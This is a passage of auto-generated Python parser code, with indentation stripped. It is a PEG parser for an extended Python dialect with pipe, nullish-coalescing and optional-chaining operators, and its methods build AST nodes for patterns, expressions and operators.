def items_pattern(self) -> Optional[Any]:
# items_pattern: ','.key_value_pattern+
mark = self._mark()
if (
(_gather_74 := self._gather_74())
):
return _gather_74
self._reset(mark)
return None
@memoize
def key_value_pattern(self) -> Optional[Any]:
# key_value_pattern: (literal_expr | attr) ':' pattern
mark = self._mark()
if (
(key := self._tmp_76())
and
(literal := self.expect(':'))
and
(pattern := self.pattern())
):
return ( key , pattern )
self._reset(mark)
return None
@memoize
def double_star_pattern(self) -> Optional[Any]:
# double_star_pattern: '**' pattern_capture_target
mark = self._mark()
if (
(literal := self.expect('**'))
and
(target := self.pattern_capture_target())
):
return target
self._reset(mark)
return None
@memoize
def class_pattern(self) -> Optional["ast.MatchClass"]:
# class_pattern: name_or_attr '(' ')' | name_or_attr '(' positional_patterns ','? ')' | name_or_attr '(' keyword_patterns ','? ')' | name_or_attr '(' positional_patterns ',' keyword_patterns ','? ')' | invalid_class_pattern
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(cls := self.name_or_attr())
and
(literal := self.expect('('))
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchClass ( cls = cls , patterns = [] , kwd_attrs = [] , kwd_patterns = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(cls := self.name_or_attr())
and
(literal := self.expect('('))
and
(patterns := self.positional_patterns())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchClass ( cls = cls , patterns = patterns , kwd_attrs = [] , kwd_patterns = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(cls := self.name_or_attr())
and
(literal := self.expect('('))
and
(keywords := self.keyword_patterns())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchClass ( cls = cls , patterns = [] , kwd_attrs = [k for k , _ in keywords] , kwd_patterns = [p for _ , p in keywords] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(cls := self.name_or_attr())
and
(literal := self.expect('('))
and
(patterns := self.positional_patterns())
and
(literal_1 := self.expect(','))
and
(keywords := self.keyword_patterns())
and
(opt := self.expect(','),)
and
(literal_2 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchClass ( cls = cls , patterns = patterns , kwd_attrs = [k for k , _ in keywords] , kwd_patterns = [p for _ , p in keywords] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(invalid_class_pattern := self.invalid_class_pattern())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def positional_patterns(self) -> Optional[Any]:
# positional_patterns: ','.pattern+
mark = self._mark()
if (
(args := self._gather_77())
):
return args
self._reset(mark)
return None
@memoize
def keyword_patterns(self) -> Optional[Any]:
# keyword_patterns: ','.keyword_pattern+
mark = self._mark()
if (
(_gather_79 := self._gather_79())
):
return _gather_79
self._reset(mark)
return None
@memoize
def keyword_pattern(self) -> Optional[Any]:
# keyword_pattern: NAME '=' pattern
mark = self._mark()
if (
(arg := self.name())
and
(literal := self.expect('='))
and
(value := self.pattern())
):
return ( arg . string , value )
self._reset(mark)
return None
@memoize
def expressions(self) -> Optional[Any]:
# expressions: expression ((',' expression))+ ','? | expression ',' | expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.expression())
and
(b := self._loop1_81())
and
(opt := self.expect(','),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] + b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.expression())
and
(literal := self.expect(','))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def expression(self) -> Optional[Any]:
# expression: invalid_expression | disjunction 'if' disjunction 'else' expression | disjunction '?' !'?' disjunction ':' expression | disjunction | lambdef
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_expression := self.invalid_expression())
):
return None # pragma: no cover
self._reset(mark)
if (
(a := self.disjunction())
and
(literal := self.expect('if'))
and
(b := self.disjunction())
and
(literal_1 := self.expect('else'))
and
(c := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . IfExp ( body = a , test = b , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(b := self.disjunction())
and
(literal := self.expect('?'))
and
self.negative_lookahead(self.expect, '?')
and
(a := self.disjunction())
and
(literal_1 := self.expect(':'))
and
(c := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . IfExp ( body = a , test = b , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(disjunction := self.disjunction())
):
return disjunction
self._reset(mark)
if (
(lambdef := self.lambdef())
):
return lambdef
self._reset(mark)
return None
@memoize
def yield_expr(self) -> Optional[Any]:
# yield_expr: 'yield' 'from' expression | 'yield' star_expressions?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('yield'))
and
(literal_1 := self.expect('from'))
and
(a := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . YieldFrom ( value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('yield'))
and
(a := self.star_expressions(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Yield ( value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def star_expressions(self) -> Optional[Any]:
# star_expressions: star_expression ((',' star_expression))+ ','? | star_expression ',' | star_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.star_expression())
and
(b := self._loop1_82())
and
(opt := self.expect(','),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] + b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.star_expression())
and
(literal := self.expect(','))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(star_expression := self.star_expression())
):
return star_expression
self._reset(mark)
return None
@memoize
def star_expression(self) -> Optional[Any]:
# star_expression: '*' bitwise_or | expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(a := self.bitwise_or())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Starred ( value = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(expression := self.expression())
):
return expression
self._reset(mark)
return None
@memoize
def star_named_expressions(self) -> Optional[Any]:
# star_named_expressions: ','.star_named_expression+ ','?
mark = self._mark()
if (
(a := self._gather_83())
and
(opt := self.expect(','),)
):
return a
self._reset(mark)
return None
@memoize
def star_named_expression(self) -> Optional[Any]:
# star_named_expression: '*' bitwise_or | named_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(a := self.bitwise_or())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Starred ( value = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(named_expression := self.named_expression())
):
return named_expression
self._reset(mark)
return None
@memoize
def assignment_expression(self) -> Optional[Any]:
# assignment_expression: NAME ':=' ~ expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
cut = False
if (
(a := self.name())
and
(literal := self.expect(':='))
and
(cut := True)
and
(b := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 8 ) , "The ':=' operator is" , ast . NamedExpr ( target = ast . Name ( id = a . string , ctx = Store , lineno = a . start [0] , col_offset = a . start [1] , end_lineno = a . end [0] , end_col_offset = a . end [1] ) , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) )
self._reset(mark)
if cut: return None
return None
@memoize
def named_expression(self) -> Optional[Any]:
# named_expression: assignment_expression | invalid_named_expression | expression !':='
mark = self._mark()
if (
(assignment_expression := self.assignment_expression())
):
return assignment_expression
self._reset(mark)
if (
(invalid_named_expression := self.invalid_named_expression())
):
return None # pragma: no cover
self._reset(mark)
if (
(a := self.expression())
and
self.negative_lookahead(self.expect, ':=')
):
return a
self._reset(mark)
return None
@memoize
def disjunction(self) -> Optional[Any]:
# disjunction: conjunction (('or' conjunction))+ | conjunction (('??' conjunction))+ | conjunction
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.conjunction())
and
(b := self._loop1_85())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BoolOp ( op = ast . Or ( ) , values = [a] + b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.conjunction())
and
(b := self._loop1_86())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 8 ) , "The '??' operator is" , self . make_nullish_coalescing ( [a] + b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(conjunction := self.conjunction())
):
return conjunction
self._reset(mark)
return None
@memoize
def conjunction(self) -> Optional[Any]:
# conjunction: inversion (('and' inversion))+ | inversion
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.inversion())
and
(b := self._loop1_87())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BoolOp ( op = ast . And ( ) , values = [a] + b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(inversion := self.inversion())
):
return inversion
self._reset(mark)
return None
@memoize
def inversion(self) -> Optional[Any]:
# inversion: 'not' inversion | comparison
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('not'))
and
(a := self.inversion())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . UnaryOp ( op = ast . Not ( ) , operand = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(comparison := self.comparison())
):
return comparison
self._reset(mark)
return None
@memoize
def comparison(self) -> Optional[Any]:
# comparison: pipe_expression compare_op_pipe_expression_pair+ | pipe_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.pipe_expression())
and
(b := self._loop1_88())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Compare ( left = a , ops = self . get_comparison_ops ( b ) , comparators = self . get_comparators ( b ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(pipe_expression := self.pipe_expression())
):
return pipe_expression
self._reset(mark)
return None
@memoize
def compare_op_pipe_expression_pair(self) -> Optional[Any]:
# compare_op_pipe_expression_pair: eq_pipe_expression | noteq_pipe_expression | lte_pipe_expression | lt_pipe_expression | gte_pipe_expression | gt_pipe_expression | notin_pipe_expression | in_pipe_expression | isnot_pipe_expression | is_pipe_expression
mark = self._mark()
if (
(eq_pipe_expression := self.eq_pipe_expression())
):
return eq_pipe_expression
self._reset(mark)
if (
(noteq_pipe_expression := self.noteq_pipe_expression())
):
return noteq_pipe_expression
self._reset(mark)
if (
(lte_pipe_expression := self.lte_pipe_expression())
):
return lte_pipe_expression
self._reset(mark)
if (
(lt_pipe_expression := self.lt_pipe_expression())
):
return lt_pipe_expression
self._reset(mark)
if (
(gte_pipe_expression := self.gte_pipe_expression())
):
return gte_pipe_expression
self._reset(mark)
if (
(gt_pipe_expression := self.gt_pipe_expression())
):
return gt_pipe_expression
self._reset(mark)
if (
(notin_pipe_expression := self.notin_pipe_expression())
):
return notin_pipe_expression
self._reset(mark)
if (
(in_pipe_expression := self.in_pipe_expression())
):
return in_pipe_expression
self._reset(mark)
if (
(isnot_pipe_expression := self.isnot_pipe_expression())
):
return isnot_pipe_expression
self._reset(mark)
if (
(is_pipe_expression := self.is_pipe_expression())
):
return is_pipe_expression
self._reset(mark)
return None
@memoize
def eq_pipe_expression(self) -> Optional[Any]:
# eq_pipe_expression: '==' pipe_expression
mark = self._mark()
if (
(literal := self.expect('=='))
and
(a := self.pipe_expression())
):
return ( ast . Eq ( ) , a )
self._reset(mark)
return None
@memoize
def noteq_pipe_expression(self) -> Optional[tuple]:
# noteq_pipe_expression: '!=' pipe_expression
mark = self._mark()
if (
(literal := self.expect('!='))
and
(a := self.pipe_expression())
):
return ( ast . NotEq ( ) , a )
self._reset(mark)
return None
@memoize
def lte_pipe_expression(self) -> Optional[Any]:
# lte_pipe_expression: '<=' pipe_expression
mark = self._mark()
if (
(literal := self.expect('<='))
and
(a := self.pipe_expression())
):
return ( ast . LtE ( ) , a )
self._reset(mark)
return None
@memoize
def lt_pipe_expression(self) -> Optional[Any]:
# lt_pipe_expression: '<' pipe_expression
mark = self._mark()
if (
(literal := self.expect('<'))
and
(a := self.pipe_expression())
):
return ( ast . Lt ( ) , a )
self._reset(mark)
return None
@memoize
def gte_pipe_expression(self) -> Optional[Any]:
# gte_pipe_expression: '>=' pipe_expression
mark = self._mark()
if (
(literal := self.expect('>='))
and
(a := self.pipe_expression())
):
return ( ast . GtE ( ) , a )
self._reset(mark)
return None
@memoize
def gt_pipe_expression(self) -> Optional[Any]:
# gt_pipe_expression: '>' pipe_expression
mark = self._mark()
if (
(literal := self.expect('>'))
and
(a := self.pipe_expression())
):
return ( ast . Gt ( ) , a )
self._reset(mark)
return None
@memoize
def notin_pipe_expression(self) -> Optional[Any]:
# notin_pipe_expression: 'not' 'in' pipe_expression
mark = self._mark()
if (
(literal := self.expect('not'))
and
(literal_1 := self.expect('in'))
and
(a := self.pipe_expression())
):
return ( ast . NotIn ( ) , a )
self._reset(mark)
return None
@memoize
def in_pipe_expression(self) -> Optional[Any]:
# in_pipe_expression: 'in' pipe_expression
mark = self._mark()
if (
(literal := self.expect('in'))
and
(a := self.pipe_expression())
):
return ( ast . In ( ) , a )
self._reset(mark)
return None
@memoize
def isnot_pipe_expression(self) -> Optional[Any]:
# isnot_pipe_expression: 'is' 'not' pipe_expression
mark = self._mark()
if (
(literal := self.expect('is'))
and
(literal_1 := self.expect('not'))
and
(a := self.pipe_expression())
):
return ( ast . IsNot ( ) , a )
self._reset(mark)
return None
@memoize
def is_pipe_expression(self) -> Optional[Any]:
# is_pipe_expression: 'is' pipe_expression
mark = self._mark()
if (
(literal := self.expect('is'))
and
(a := self.pipe_expression())
):
return ( ast . Is ( ) , a )
self._reset(mark)
return None
@memoize_left_rec
def pipe_expression(self) -> Optional[Any]:
# pipe_expression: pipe_expression '|>' bitwise_or | bitwise_or
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.pipe_expression())
and
(literal := self.expect('|>'))
and
(b := self.bitwise_or())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Call ( func = b , args = [a] , keywords = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(bitwise_or := self.bitwise_or())
):
return bitwise_or
self._reset(mark)
return None
@memoize_left_rec
def bitwise_or(self) -> Optional[Any]:
# bitwise_or: bitwise_or '|' bitwise_xor | bitwise_xor
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.bitwise_or())
and
(literal := self.expect('|'))
and
(b := self.bitwise_xor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . BitOr ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(bitwise_xor := self.bitwise_xor())
):
return bitwise_xor
self._reset(mark)
return None
@memoize_left_rec
def bitwise_xor(self) -> Optional[Any]:
# bitwise_xor: bitwise_xor '^' bitwise_and | bitwise_and
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.bitwise_xor())
and
(literal := self.expect('^'))
and
(b := self.bitwise_and())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . BitXor ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(bitwise_and := self.bitwise_and())
):
return bitwise_and
self._reset(mark)
return None
@memoize_left_rec
def bitwise_and(self) -> Optional[Any]:
# bitwise_and: bitwise_and '&' shift_expr | shift_expr
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.bitwise_and())
and
(literal := self.expect('&'))
and
(b := self.shift_expr())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . BitAnd ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(shift_expr := self.shift_expr())
):
return shift_expr
self._reset(mark)
return None
@memoize_left_rec
def shift_expr(self) -> Optional[Any]:
# shift_expr: shift_expr '<<' sum | shift_expr '>>' sum | sum
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.shift_expr())
and
(literal := self.expect('<<'))
and
(b := self.sum())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . LShift ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.shift_expr())
and
(literal := self.expect('>>'))
and
(b := self.sum())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . RShift ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(sum := self.sum())
):
return sum
self._reset(mark)
return None
@memoize_left_rec
def sum(self) -> Optional[Any]:
# sum: sum '+' term | sum '-' term | term
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.sum())
and
(literal := self.expect('+'))
and
(b := self.term())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Add ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.sum())
and
(literal := self.expect('-'))
and
(b := self.term())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Sub ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(term := self.term())
):
return term
self._reset(mark)
return None
@memoize_left_rec
def term(self) -> Optional[Any]:
# term: term '*' factor | term '/' factor | term '//' factor | term '%' factor | term '@' factor | factor
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.term())
and
(literal := self.expect('*'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Mult ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.term())
and
(literal := self.expect('/'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Div ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.term())
and
(literal := self.expect('//'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . FloorDiv ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.term())
and
(literal := self.expect('%'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Mod ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.term())
and
(literal := self.expect('@'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 5 ) , "The '@' operator is" , ast . BinOp ( left = a , op = ast . MatMult ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(factor := self.factor())
):
return factor
self._reset(mark)
return None
@memoize
def factor(self) -> Optional[Any]:
# factor: '+' factor | '-' factor | '~' factor | power
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('+'))
and
(a := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . UnaryOp ( op = ast . UAdd ( ) , operand = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('-'))
and
(a := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . UnaryOp ( op = ast . USub ( ) , operand = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('~'))
and
(a := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . UnaryOp ( op = ast . Invert ( ) , operand = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(power := self.power())
):
return power
self._reset(mark)
return None
@memoize
def power(self) -> Optional[Any]:
# power: await_primary '**' factor | await_primary
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.await_primary())
and
(literal := self.expect('**'))
and
(b := self.factor())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = a , op = ast . Pow ( ) , right = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(await_primary := self.await_primary())
):
return await_primary
self._reset(mark)
return None
@memoize
def await_primary(self) -> Optional[Any]:
# await_primary: 'await' primary | primary
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('await'))
and
(a := self.primary())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 5 ) , "Await expressions are" , ast . Await ( a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(primary := self.primary())
):
return primary
self._reset(mark)
return None
@memoize_left_rec
def primary(self) -> Optional[Any]:
# primary: primary '.' NAME | primary '?' '.' NAME '(' arguments? ')' | primary '?' '.' NAME | primary genexp | primary '(' arguments? ')' | primary '(' partial_arguments ')' | primary '[' slices ']' | primary '?' '[' slice ']' | atom
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.primary())
and
(literal := self.expect('.'))
and
(b := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.primary())
and
(literal := self.expect('?'))
and
(literal_1 := self.expect('.'))
and
(b := self.name())
and
(literal_2 := self.expect('('))
and
(c := self.arguments(),)
and
(literal_3 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . make_optional_chaining ( a , ast . Call ( func = ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) , args = c [0] if c else [] , keywords = c [1] if c else [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.primary())
and
(literal := self.expect('?'))
and
(literal_1 := self.expect('.'))
and
(b := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . make_optional_chaining ( a , ast . Attribute ( value = a , attr = b . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.primary())
and
(b := self.genexp())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Call ( func = a , args = [b] , keywords = [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.primary())
and
(literal := self.expect('('))
and
(b := self.arguments(),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Call ( func = a , args = b [0] if b else [] , keywords = b [1] if b else [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(a := self.primary())
and
(literal := self.expect('('))
and
(b := self.partial_arguments())
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . make_partial_function ( a , b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.primary())
and
(literal := self.expect('['))
and
(b := self.slices())
and
(literal_1 := self.expect(']'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Subscript ( value = a , slice = b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.primary())
and
(literal := self.expect('?'))
and
(literal_1 := self.expect('['))
and
(b := self.slice())
and
(literal_2 := self.expect(']'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . make_optional_chaining ( a , ast . Subscript ( value = a , slice = b , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(atom := self.atom())
):
return atom
self._reset(mark)
return None
@memoize
def slices(self) -> Optional[Any]:
# slices: slice !',' | ','.slice+ ','?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.slice())
and
self.negative_lookahead(self.expect, ',')
):
return a
self._reset(mark)
if (
(a := self._gather_89())
and
(opt := self.expect(','),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
